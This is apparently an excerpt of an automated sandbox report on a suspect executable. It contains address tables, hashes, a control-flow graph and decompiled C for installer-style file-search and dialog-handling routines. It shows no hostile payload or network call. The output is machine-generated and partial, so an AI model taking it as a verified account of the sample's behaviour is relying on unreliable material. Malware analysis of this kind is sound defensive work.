                      0x00000000
                      0x0040754e
                      0x00406cab
                      0x00406cbb
                      0x00406cbe
                      0x00406cc1
                      0x00406cc1
                      0x00406cc1
                      0x00406cc4
                      0x00406cc8
                      0x00000000
                      0x00000000
                      0x00406cca
                      0x00406cd0
                      0x00406cfa
                      0x00406d00
                      0x00406d07
                      0x00000000
                      0x00406d07
                      0x00406cd6
                      0x00406cd9
                      0x00406cde
                      0x00406cde
                      0x00406ce9
                      0x00406cf1
                      0x00406cf4
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406d39
                      0x00406d3f
                      0x00406d42
                      0x00406d4f
                      0x00406d57
                      0x00000000
                      0x00000000
                      0x00406d0e
                      0x00406d0e
                      0x00406d12
                      0x0040755d
                      0x00000000
                      0x0040755d
                      0x00406d1e
                      0x00406d29
                      0x00406d29
                      0x00406d29
                      0x00406d2c
                      0x00406d2f
                      0x00406d32
                      0x00406d37
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406ffe
                      0x00407002
                      0x00407020
                      0x00407023
                      0x0040702a
                      0x0040702d
                      0x00407030
                      0x00407033
                      0x00407036
                      0x00407039
                      0x0040703b
                      0x00407042
                      0x00407043
                      0x00407045
                      0x00407048
                      0x0040704b
                      0x0040704e
                      0x0040704e
                      0x00407053
                      0x00000000
                      0x00407053
                      0x00407004
                      0x00407007
                      0x0040700a
                      0x00407014
                      0x00000000
                      0x00000000
                      0x00407068
                      0x0040706c
                      0x0040708f
                      0x00407092
                      0x00407095
                      0x0040709f
                      0x0040706e
                      0x0040706e
                      0x00407071
                      0x00407074
                      0x00407077
                      0x00407084
                      0x00407087
                      0x00407087
                      0x00000000
                      0x00000000
                      0x004070ab
                      0x004070af
                      0x00000000
                      0x00000000
                      0x004070b5
                      0x004070b9
                      0x00000000
                      0x00000000
                      0x004070bf
                      0x004070c1
                      0x004070c5
                      0x004070c5
                      0x004070c8
                      0x004070cc
                      0x00000000
                      0x00000000
                      0x0040711c
                      0x00407120
                      0x00407127
                      0x0040712a
                      0x0040712d
                      0x00407137
                      0x00000000
                      0x00407137
                      0x00407122
                      0x00000000
                      0x00000000
                      0x00407143
                      0x00407147
                      0x0040714e
                      0x00407151
                      0x00407154
                      0x00407149
                      0x00407149
                      0x00407149
                      0x00407157
                      0x0040715a
                      0x0040715d
                      0x0040715d
                      0x00407160
                      0x00407163
                      0x00407166
                      0x00407166
                      0x00407169
                      0x00407170
                      0x00407175
                      0x00000000
                      0x00000000
                      0x00407203
                      0x00407203
                      0x00407207
                      0x004075a5
                      0x00000000
                      0x004075a5
                      0x0040720d
                      0x00407210
                      0x00407213
                      0x00407217
                      0x0040721a
                      0x00407220
                      0x00407222
                      0x00407222
                      0x00407222
                      0x00407225
                      0x00407228
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00407286
                      0x00407286
                      0x0040728a
                      0x004075b1
                      0x00000000
                      0x004075b1
                      0x00407290
                      0x00407293
                      0x00407296
                      0x0040729a
                      0x0040729d
                      0x004072a3
                      0x004072a5
                      0x004072a5
                      0x004072a5
                      0x004072a8
                      0x00000000
                      0x00000000
                      0x00407056
                      0x00407056
                      0x00407059
                      0x00000000
                      0x00000000
                      0x00407395
                      0x00407399
                      0x004073bb
                      0x004073be
                      0x004073c8
                      0x00000000
                      0x004073c8
                      0x0040739b
                      0x0040739e
                      0x004073a2
                      0x004073a5
                      0x004073a5
                      0x004073a8
                      0x00000000
                      0x00000000
                      0x00407452
                      0x00407456
                      0x00407474
                      0x00407474
                      0x00407474
                      0x0040747b
                      0x00407482
                      0x00407489
                      0x00407489
                      0x00000000
                      0x00407489
                      0x00407458
                      0x0040745b
                      0x0040745e
                      0x00407461
                      0x00407468
                      0x004073ac
                      0x004073ac
                      0x004073af
                      0x00000000
                      0x00000000
                      0x00407543
                      0x00407546
                      0x00000000
                      0x00000000
                      0x0040717d
                      0x0040717f
                      0x00407186
                      0x00407187
                      0x00407189
                      0x0040718c
                      0x00000000
                      0x00000000
                      0x00407194
                      0x00407197
                      0x0040719a
                      0x0040719c
                      0x0040719e
                      0x0040719e
                      0x0040719f
                      0x004071a2
                      0x004071a9
                      0x004071ac
                      0x004071ba
                      0x00000000
                      0x00000000
                      0x00407490
                      0x00407490
                      0x00407493
                      0x0040749a
                      0x00000000
                      0x00000000
                      0x0040749f
                      0x0040749f
                      0x004074a3
                      0x004075db
                      0x00000000
                      0x004075db
                      0x004074a9
                      0x004074ac
                      0x004074af
                      0x004074b3
                      0x004074b6
                      0x004074bc
                      0x004074be
                      0x004074be
                      0x004074be
                      0x004074c1
                      0x004074c4
                      0x004074c4
                      0x004074c4
                      0x004074c4
                      0x004074c7
                      0x004074c7
                      0x004074cb
                      0x0040752b
                      0x0040752e
                      0x00407533
                      0x00407534
                      0x00407536
                      0x00407538
                      0x0040753b
                      0x00000000
                      0x0040753b
                      0x004074cd
                      0x004074d3
                      0x004074d6
                      0x004074d9
                      0x004074dc
                      0x004074df
                      0x004074e2
                      0x004074e5
                      0x004074e8
                      0x004074eb
                      0x004074ee
                      0x00407507
                      0x0040750a
                      0x0040750d
                      0x00407510
                      0x00407514
                      0x00407516
                      0x00407516
                      0x00407517
                      0x0040751a
                      0x004074f0
                      0x004074f0
                      0x004074f8
                      0x004074fd
                      0x004074ff
                      0x00407502
                      0x00407502
                      0x0040751d
                      0x00407524
                      0x00000000
                      0x00407526
                      0x00000000
                      0x00407526
                      0x00000000
                      0x004071c2
                      0x004071c5
                      0x004071fb
                      0x0040732b
                      0x0040732b
                      0x0040732b
                      0x0040732b
                      0x0040732e
                      0x0040732e
                      0x00407331
                      0x00407333
                      0x004075bd
                      0x00000000
                      0x004075bd
                      0x00407339
                      0x0040733c
                      0x00000000
                      0x00000000
                      0x00407342
                      0x00407346
                      0x00407349
                      0x00407349
                      0x00407349
                      0x00000000
                      0x00407349
                      0x004071c7
                      0x004071c9
                      0x004071cb
                      0x004071cd
                      0x004071d0
                      0x004071d1
                      0x004071d3
                      0x004071d5
                      0x004071d8
                      0x004071db
                      0x004071f1
                      0x004071f6
                      0x0040722e
                      0x0040722e
                      0x00407232
                      0x0040725e
                      0x00407260
                      0x00407267
                      0x0040726a
                      0x0040726d
                      0x0040726d
                      0x00407272
                      0x00407272
                      0x00407274
                      0x00407277
                      0x0040727e
                      0x00407281
                      0x004072ae
                      0x004072ae
                      0x004072b1
                      0x004072b4
                      0x00407328
                      0x00407328
                      0x00407328
                      0x00000000
                      0x00407328
                      0x004072b6
                      0x004072bc
                      0x004072bf
                      0x004072c2
                      0x004072c5
                      0x004072c8
                      0x004072cb
                      0x004072ce
                      0x004072d1
                      0x004072d4
                      0x004072d7
                      0x004072f0
                      0x004072f2
                      0x004072f5
                      0x004072f6
                      0x004072f9
                      0x004072fb
                      0x004072fe
                      0x00407300
                      0x00407302
                      0x00407305
                      0x00407307
                      0x0040730a
                      0x0040730e
                      0x00407310
                      0x00407310
                      0x00407311
                      0x00407314
                      0x00407317
                      0x004072d9
                      0x004072d9
                      0x004072e1
                      0x004072e6
                      0x004072e8
                      0x004072eb
                      0x004072eb
                      0x0040731a
                      0x00407321
                      0x004072ab
                      0x004072ab
                      0x004072ab
                      0x004072ab
                      0x00000000
                      0x00407323
                      0x00000000
                      0x00407323
                      0x00407321
                      0x00407234
                      0x00407237
                      0x00407239
                      0x0040723c
                      0x0040723f
                      0x00407242
                      0x00407244
                      0x00407247
                      0x0040724a
                      0x0040724a
                      0x0040724d
                      0x0040724d
                      0x00407250
                      0x00407257
                      0x0040722b
                      0x0040722b
                      0x0040722b
                      0x0040722b
                      0x00000000
                      0x00407259
                      0x00000000
                      0x00407259
                      0x00407257
                      0x004071dd
                      0x004071e0
                      0x004071e2
                      0x004071e5
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004070cf
                      0x004070cf
                      0x004070d3
                      0x00407599
                      0x00000000
                      0x00407599
                      0x004070d9
                      0x004070dc
                      0x004070df
                      0x004070e2
                      0x004070e4
                      0x004070e4
                      0x004070e4
                      0x004070e7
                      0x004070ea
                      0x004070ed
                      0x004070f0
                      0x004070f3
                      0x004070f6
                      0x004070f7
                      0x004070f9
                      0x004070f9
                      0x004070f9
                      0x004070fc
                      0x004070ff
                      0x00407102
                      0x00407105
                      0x00407105
                      0x00407105
                      0x00407108
                      0x00000000
                      0x00000000
                      0x0040734c
                      0x0040734c
                      0x0040734c
                      0x00407350
                      0x00000000
                      0x00000000
                      0x00407356
                      0x00407359
                      0x0040735c
                      0x0040735f
                      0x00407361
                      0x00407361
                      0x00407361
                      0x00407364
                      0x00407367
                      0x0040736a
                      0x0040736d
                      0x00407370
                      0x00407373
                      0x00407374
                      0x00407376
                      0x00407376
                      0x00407376
                      0x00407379
                      0x0040737c
                      0x0040737f
                      0x00407382
                      0x00407385
                      0x00407389
                      0x0040738b
                      0x0040738e
                      0x00000000
                      0x00407390
                      0x00000000
                      0x00407390
                      0x0040738e
                      0x004075c3
                      0x00000000
                      0x00000000
                      0x00406bf2

                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                      • Instruction ID: 02c1e40b0c9780dd067322b7733c474732bd0f187a49f53fd7fd3c108ee94619
                      • Opcode Fuzzy Hash: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                      • Instruction Fuzzy Hash: 7CF15570D04229CBDF28CFA8C8946ADBBB0FF44305F24816ED456BB281D7386A86DF45
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E0040699E(WCHAR* _a4) {
                      				void* _t2;
                      
                      				_t2 = FindFirstFileW(_a4, 0x426798); // executed
                      				if(_t2 == 0xffffffff) {
                      					return 0;
                      				}
                      				FindClose(_t2);
                      				return 0x426798;
                      			}




                      0x004069a9
                      0x004069b2
                      0x00000000
                      0x004069bf
                      0x004069b5
                      0x00000000

                      APIs
                      • FindFirstFileW.KERNELBASE(772EFAA0,00426798,00425F50,00406088,00425F50,00425F50,00000000,00425F50,00425F50,772EFAA0,?,772EF560,00405D94,?,772EFAA0,772EF560), ref: 004069A9
                      • FindClose.KERNEL32(00000000), ref: 004069B5
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: Find$CloseFileFirst
                      • String ID:
                      • API String ID: 2295610775-0
                      • Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                      • Instruction ID: 0ca7534fdffec89160a31ceabb6ef5ff718bfc83d1618d69d17f9e635378cbc3
                      • Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                      • Instruction Fuzzy Hash: 5ED012B15192205FC34057387E0C84B7A989F563317268A36B4AAF11E0CB348C3297AC
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 141 4040c5-4040d7 142 4040dd-4040e3 141->142 143 40423e-40424d 141->143 142->143 144 4040e9-4040f2 142->144 145 40429c-4042b1 143->145 146 40424f-40428a GetDlgItem * 2 call 4045c4 KiUserCallbackDispatcher call 40140b 143->146 147 4040f4-404101 SetWindowPos 144->147 148 404107-40410e 144->148 150 4042f1-4042f6 call 404610 145->150 151 4042b3-4042b6 145->151 173 40428f-404297 146->173 147->148 153 404110-40412a ShowWindow 148->153 154 404152-404158 148->154 160 4042fb-404316 150->160 156 4042b8-4042c3 call 401389 151->156 157 4042e9-4042eb 151->157 161 404130-404143 GetWindowLongW 153->161 162 40422b-404239 call 40462b 153->162 163 404171-404174 154->163 164 40415a-40416c DestroyWindow 154->164 156->157 176 4042c5-4042e4 SendMessageW 156->176 157->150 159 404591 157->159 171 404593-40459a 159->171 168 404318-40431a call 40140b 160->168 169 40431f-404325 160->169 161->162 170 404149-40414c ShowWindow 161->170 162->171 174 404176-404182 SetWindowLongW 163->174 175 404187-40418d 163->175 172 40456e-404574 164->172 168->169 180 40432b-404336 169->180 181 40454f-404568 DestroyWindow EndDialog 169->181 170->154 172->159 179 404576-40457c 172->179 173->145 174->171 175->162 182 404193-4041a2 GetDlgItem 175->182 176->171 179->159 185 40457e-404587 ShowWindow 179->185 180->181 186 40433c-404389 call 4066a5 call 4045c4 * 3 GetDlgItem 180->186 181->172 183 4041c1-4041c4 182->183 184 4041a4-4041bb SendMessageW IsWindowEnabled 182->184 187 4041c6-4041c7 183->187 188 4041c9-4041cc 183->188 184->159 184->183 185->159 213 404393-4043cf ShowWindow EnableWindow call 4045e6 EnableWindow 186->213 214 40438b-404390 186->214 190 4041f7-4041fc call 40459d 187->190 191 4041da-4041df 188->191 192 4041ce-4041d4 188->192 190->162 194 404215-404225 SendMessageW 191->194 196 4041e1-4041e7 191->196 192->194 195 4041d6-4041d8 192->195 194->162 195->190 199 4041e9-4041ef call 40140b 196->199 200 4041fe-404207 call 40140b 196->200 211 4041f5 199->211 200->162 209 404209-404213 200->209 209->211 211->190 217 4043d1-4043d2 213->217 218 4043d4 213->218 214->213 219 4043d6-404404 GetSystemMenu EnableMenuItem SendMessageW 217->219 218->219 220 404406-404417 SendMessageW 219->220 221 404419 219->221 222 40441f-40445e call 4045f9 call 4040a6 call 406668 lstrlenW call 4066a5 SetWindowTextW call 401389 220->222 221->222 222->160 233 404464-404466 222->233 233->160 234 40446c-404470 233->234 235 404472-404478 234->235 236 40448f-4044a3 DestroyWindow 234->236 235->159 237 40447e-404484 235->237 236->172 238 4044a9-4044d6 CreateDialogParamW 236->238 237->160 239 40448a 237->239 238->172 240 4044dc-404533 call 4045c4 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 238->240 239->159 240->159 245 404535-40454d ShowWindow call 404610 240->245 245->172
                      C-Code - Quality: 84%
                      			E004040C5(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
                      				struct HWND__* _v28;
                      				void* _v84;
                      				void* _v88;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				signed int _t34;
                      				signed int _t36;
                      				signed int _t38;
                      				struct HWND__* _t48;
                      				signed int _t67;
                      				struct HWND__* _t73;
                      				signed int _t86;
                      				struct HWND__* _t91;
                      				signed int _t99;
                      				int _t103;
                      				signed int _t117;
                      				int _t118;
                      				int _t122;
                      				signed int _t124;
                      				struct HWND__* _t127;
                      				struct HWND__* _t128;
                      				int _t129;
                      				intOrPtr _t130;
                      				long _t133;
                      				int _t135;
                      				int _t136;
                      				void* _t137;
                      				void* _t145;
                      
                      				_t130 = _a8;
                      				if(_t130 == 0x110 || _t130 == 0x408) {
                      					_t34 = _a12;
                      					_t127 = _a4;
                      					__eflags = _t130 - 0x110;
                      					 *0x423730 = _t34;
                      					if(_t130 == 0x110) {
                      						 *0x42a268 = _t127;
                      						 *0x423744 = GetDlgItem(_t127, 1);
                      						_t91 = GetDlgItem(_t127, 2);
                      						_push(0xffffffff);
                      						_push(0x1c);
                      						 *0x421710 = _t91;
                      						E004045C4(_t127);
                      						SetClassLongW(_t127, 0xfffffff2,  *0x429248); // executed
                      						 *0x42922c = E0040140B(4);
                      						_t34 = 1;
                      						__eflags = 1;
                      						 *0x423730 = 1;
                      					}
                      					_t124 =  *0x40a39c; // 0x0
                      					_t136 = 0;
                      					_t133 = (_t124 << 6) +  *0x42a280;
                      					__eflags = _t124;
                      					if(_t124 < 0) {
                      						L36:
                      						E00404610(0x40b);
                      						while(1) {
                      							_t36 =  *0x423730;
                      							 *0x40a39c =  *0x40a39c + _t36;
                      							_t133 = _t133 + (_t36 << 6);
                      							_t38 =  *0x40a39c; // 0x0
                      							__eflags = _t38 -  *0x42a284;
                      							if(_t38 ==  *0x42a284) {
                      								E0040140B(1);
                      							}
                      							__eflags =  *0x42922c - _t136;
                      							if( *0x42922c != _t136) {
                      								break;
                      							}
                      							__eflags =  *0x40a39c -  *0x42a284; // 0x0
                      							if(__eflags >= 0) {
                      								break;
                      							}
                      							_t117 =  *(_t133 + 0x14);
                      							E004066A5(_t117, _t127, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
                      							_push( *((intOrPtr*)(_t133 + 0x20)));
                      							_push(0xfffffc19);
                      							E004045C4(_t127);
                      							_push( *((intOrPtr*)(_t133 + 0x1c)));
                      							_push(0xfffffc1b);
                      							E004045C4(_t127);
                      							_push( *((intOrPtr*)(_t133 + 0x28)));
                      							_push(0xfffffc1a);
                      							E004045C4(_t127);
                      							_t48 = GetDlgItem(_t127, 3);
                      							__eflags =  *0x42a2ec - _t136;
                      							_v28 = _t48;
                      							if( *0x42a2ec != _t136) {
                      								_t117 = _t117 & 0x0000fefd | 0x00000004;
                      								__eflags = _t117;
                      							}
                      							ShowWindow(_t48, _t117 & 0x00000008);
                      							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
                      							E004045E6(_t117 & 0x00000002);
                      							_t118 = _t117 & 0x00000004;
                      							EnableWindow( *0x421710, _t118);
                      							__eflags = _t118 - _t136;
                      							if(_t118 == _t136) {
                      								_push(1);
                      							} else {
                      								_push(_t136);
                      							}
                      							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
                      							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
                      							__eflags =  *0x42a2ec - _t136;
                      							if( *0x42a2ec == _t136) {
                      								_push( *0x423744);
                      							} else {
                      								SendMessageW(_t127, 0x401, 2, _t136);
                      								_push( *0x421710);
                      							}
                      							E004045F9();
                      							E00406668(0x423748, E004040A6());
                      							E004066A5(0x423748, _t127, _t133,  &(0x423748[lstrlenW(0x423748)]),  *((intOrPtr*)(_t133 + 0x18)));
                      							SetWindowTextW(_t127, 0x423748);
                      							_push(_t136);
                      							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
                      							__eflags = _t67;
                      							if(_t67 != 0) {
                      								continue;
                      							} else {
                      								__eflags =  *_t133 - _t136;
                      								if( *_t133 == _t136) {
                      									continue;
                      								}
                      								__eflags =  *(_t133 + 4) - 5;
                      								if( *(_t133 + 4) != 5) {
                      									DestroyWindow( *0x429238);
                      									 *0x422720 = _t133;
                      									__eflags =  *_t133 - _t136;
                      									if( *_t133 <= _t136) {
                      										goto L60;
                      									}
                      									_t73 = CreateDialogParamW( *0x42a260,  *_t133 +  *0x429240 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133);
                      									__eflags = _t73 - _t136;
                      									 *0x429238 = _t73;
                      									if(_t73 == _t136) {
                      										goto L60;
                      									}
                      									_push( *((intOrPtr*)(_t133 + 0x2c)));
                      									_push(6);
                      									E004045C4(_t73);
                      									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
                      									ScreenToClient(_t127, _t137 + 0x10);
                      									SetWindowPos( *0x429238, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                      									_push(_t136);
                      									E00401389( *((intOrPtr*)(_t133 + 0xc)));
                      									__eflags =  *0x42922c - _t136;
                      									if( *0x42922c != _t136) {
                      										goto L63;
                      									}
                      									ShowWindow( *0x429238, 8);
                      									E00404610(0x405);
                      									goto L60;
                      								}
                      								__eflags =  *0x42a2ec - _t136;
                      								if( *0x42a2ec != _t136) {
                      									goto L63;
                      								}
                      								__eflags =  *0x42a2e0 - _t136;
                      								if( *0x42a2e0 != _t136) {
                      									continue;
                      								}
                      								goto L63;
                      							}
                      						}
                      						DestroyWindow( *0x429238); // executed
                      						 *0x42a268 = _t136;
                      						EndDialog(_t127,  *0x421f18);
                      						goto L60;
                      					} else {
                      						__eflags = _t34 - 1;
                      						if(_t34 != 1) {
                      							L35:
                      							__eflags =  *_t133 - _t136;
                      							if( *_t133 == _t136) {
                      								goto L63;
                      							}
                      							goto L36;
                      						}
                      						_push(0);
                      						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
                      						__eflags = _t86;
                      						if(_t86 == 0) {
                      							goto L35;
                      						}
                      						SendMessageW( *0x429238, 0x40f, 0, 1);
                      						__eflags =  *0x42922c;
                      						return 0 |  *0x42922c == 0x00000000;
                      					}
                      				} else {
                      					_t127 = _a4;
                      					_t136 = 0;
                      					if(_t130 == 0x47) {
                      						SetWindowPos( *0x423728, _t127, 0, 0, 0, 0, 0x13);
                      					}
                      					_t122 = _a12;
                      					if(_t130 != 5) {
                      						L8:
                      						if(_t130 != 0x40d) {
                      							__eflags = _t130 - 0x11;
                      							if(_t130 != 0x11) {
                      								__eflags = _t130 - 0x111;
                      								if(_t130 != 0x111) {
                      									goto L28;
                      								}
                      								_t135 = _t122 & 0x0000ffff;
                      								_t128 = GetDlgItem(_t127, _t135);
                      								__eflags = _t128 - _t136;
                      								if(_t128 == _t136) {
                      									L15:
                      									__eflags = _t135 - 1;
                      									if(_t135 != 1) {
                      										__eflags = _t135 - 3;
                      										if(_t135 != 3) {
                      											_t129 = 2;
                      											__eflags = _t135 - _t129;
                      											if(_t135 != _t129) {
                      												L27:
                      												SendMessageW( *0x429238, 0x111, _t122, _a16);
                      												goto L28;
                      											}
                      											__eflags =  *0x42a2ec - _t136;
                      											if( *0x42a2ec == _t136) {
                      												_t99 = E0040140B(3);
                      												__eflags = _t99;
                      												if(_t99 != 0) {
                      													goto L28;
                      												}
                      												 *0x421f18 = 1;
                      												L23:
                      												_push(0x78);
                      												L24:
                      												E0040459D();
                      												goto L28;
                      											}
                      											E0040140B(_t129);
                      											 *0x421f18 = _t129;
                      											goto L23;
                      										}
                      										__eflags =  *0x40a39c - _t136; // 0x0
                      										if(__eflags <= 0) {
                      											goto L27;
                      										}
                      										_push(0xffffffff);
                      										goto L24;
                      									}
                      									_push(_t135);
                      									goto L24;
                      								}
                      								SendMessageW(_t128, 0xf3, _t136, _t136);
                      								_t103 = IsWindowEnabled(_t128);
                      								__eflags = _t103;
                      								if(_t103 == 0) {
                      									L63:
                      									return 0;
                      								}
                      								goto L15;
                      							}
                      							SetWindowLongW(_t127, _t136, _t136);
                      							return 1;
                      						}
                      						DestroyWindow( *0x429238);
                      						 *0x429238 = _t122;
                      						L60:
                      						_t145 =  *0x425748 - _t136; // 0x0
                      						if(_t145 == 0 &&  *0x429238 != _t136) {
                      							ShowWindow(_t127, 0xa);
                      							 *0x425748 = 1;
                      						}
                      						goto L63;
                      					} else {
                      						asm("sbb eax, eax");
                      						ShowWindow( *0x423728,  ~(_t122 - 1) & 0x00000005);
                      						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
                      							L28:
                      							return E0040462B(_a8, _t122, _a16);
                      						} else {
                      							ShowWindow(_t127, 4);
                      							goto L8;
                      						}
                      					}
                      				}
                      			}
































                      0x004040d0
                      0x004040d7
                      0x0040423e
                      0x00404242
                      0x00404246
                      0x00404248
                      0x0040424d
                      0x00404258
                      0x00404263
                      0x00404268
                      0x0040426a
                      0x0040426c
                      0x0040426f
                      0x00404274
                      0x00404282
                      0x0040428f
                      0x00404296
                      0x00404296
                      0x00404297
                      0x00404297
                      0x0040429c
                      0x004042a2
                      0x004042a9
                      0x004042af
                      0x004042b1
                      0x004042f1
                      0x004042f6
                      0x004042fb
                      0x004042fb
                      0x00404300
                      0x00404309
                      0x0040430b
                      0x00404310
                      0x00404316
                      0x0040431a
                      0x0040431a
                      0x0040431f
                      0x00404325
                      0x00000000
                      0x00000000
                      0x00404330
                      0x00404336
                      0x00000000
                      0x00000000
                      0x0040433f
                      0x00404347
                      0x0040434c
                      0x0040434f
                      0x00404355
                      0x0040435a
                      0x0040435d
                      0x00404363
                      0x00404368
                      0x0040436b
                      0x00404371
                      0x00404379
                      0x0040437f
                      0x00404385
                      0x00404389
                      0x00404390
                      0x00404390
                      0x00404390
                      0x0040439a
                      0x004043ac
                      0x004043b8
                      0x004043bd
                      0x004043c7
                      0x004043cd
                      0x004043cf
                      0x004043d4
                      0x004043d1
                      0x004043d1
                      0x004043d1
                      0x004043e4
                      0x004043fc
                      0x004043fe
                      0x00404404
                      0x00404419
                      0x00404406
                      0x0040440f
                      0x00404411
                      0x00404411
                      0x0040441f
                      0x00404430
                      0x00404446
                      0x0040444d
                      0x00404453
                      0x00404457
                      0x0040445c
                      0x0040445e
                      0x00000000
                      0x00404464
                      0x00404464
                      0x00404466
                      0x00000000
                      0x00000000
                      0x0040446c
                      0x00404470
                      0x00404495
                      0x0040449b
                      0x004044a1
                      0x004044a3
                      0x00000000
                      0x00000000
                      0x004044c9
                      0x004044cf
                      0x004044d1
                      0x004044d6
                      0x00000000
                      0x00000000
                      0x004044dc
                      0x004044df
                      0x004044e2
                      0x004044f9
                      0x00404505
                      0x0040451e
                      0x00404524
                      0x00404528
                      0x0040452d
                      0x00404533
                      0x00000000
                      0x00000000
                      0x0040453d
                      0x00404548
                      0x00000000
                      0x00404548
                      0x00404472
                      0x00404478
                      0x00000000
                      0x00000000
                      0x0040447e
                      0x00404484
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0040448a
                      0x0040445e
                      0x00404555
                      0x00404561
                      0x00404568
                      0x00000000
                      0x004042b3
                      0x004042b3
                      0x004042b6
                      0x004042e9
                      0x004042e9
                      0x004042eb
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004042eb
                      0x004042b8
                      0x004042bc
                      0x004042c1
                      0x004042c3
                      0x00000000
                      0x00000000
                      0x004042d3
                      0x004042db
                      0x00000000
                      0x004042e1
                      0x004040e9
                      0x004040e9
                      0x004040ed
                      0x004040f2
                      0x00404101
                      0x00404101
                      0x00404107
                      0x0040410e
                      0x00404152
                      0x00404158
                      0x00404171
                      0x00404174
                      0x00404187
                      0x0040418d
                      0x00000000
                      0x00000000
                      0x00404193
                      0x0040419e
                      0x004041a0
                      0x004041a2
                      0x004041c1
                      0x004041c1
                      0x004041c4
                      0x004041c9
                      0x004041cc
                      0x004041dc
                      0x004041dd
                      0x004041df
                      0x00404215
                      0x00404225
                      0x00000000
                      0x00404225
                      0x004041e1
                      0x004041e7
                      0x00404200
                      0x00404205
                      0x00404207
                      0x00000000
                      0x00000000
                      0x00404209
                      0x004041f5
                      0x004041f5
                      0x004041f7
                      0x004041f7
                      0x00000000
                      0x004041f7
                      0x004041ea
                      0x004041ef
                      0x00000000
                      0x004041ef
                      0x004041ce
                      0x004041d4
                      0x00000000
                      0x00000000
                      0x004041d6
                      0x00000000
                      0x004041d6
                      0x004041c6
                      0x00000000
                      0x004041c6
                      0x004041ac
                      0x004041b3
                      0x004041b9
                      0x004041bb
                      0x00404591
                      0x00000000
                      0x00404591
                      0x00000000
                      0x004041bb
                      0x00404179
                      0x00000000
                      0x00404181
                      0x00404160
                      0x00404166
                      0x0040456e
                      0x0040456e
                      0x00404574
                      0x00404581
                      0x00404587
                      0x00404587
                      0x00000000
                      0x00404110
                      0x00404115
                      0x00404121
                      0x0040412a
                      0x0040422b
                      0x00000000
                      0x00404149
                      0x0040414c
                      0x00000000
                      0x0040414c
                      0x0040412a
                      0x0040410e

                      APIs
                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404101
                      • ShowWindow.USER32(?), ref: 00404121
                      • GetWindowLongW.USER32(?,000000F0), ref: 00404133
                      • ShowWindow.USER32(?,00000004), ref: 0040414C
                      • DestroyWindow.USER32 ref: 00404160
                      • SetWindowLongW.USER32 ref: 00404179
                      • GetDlgItem.USER32 ref: 00404198
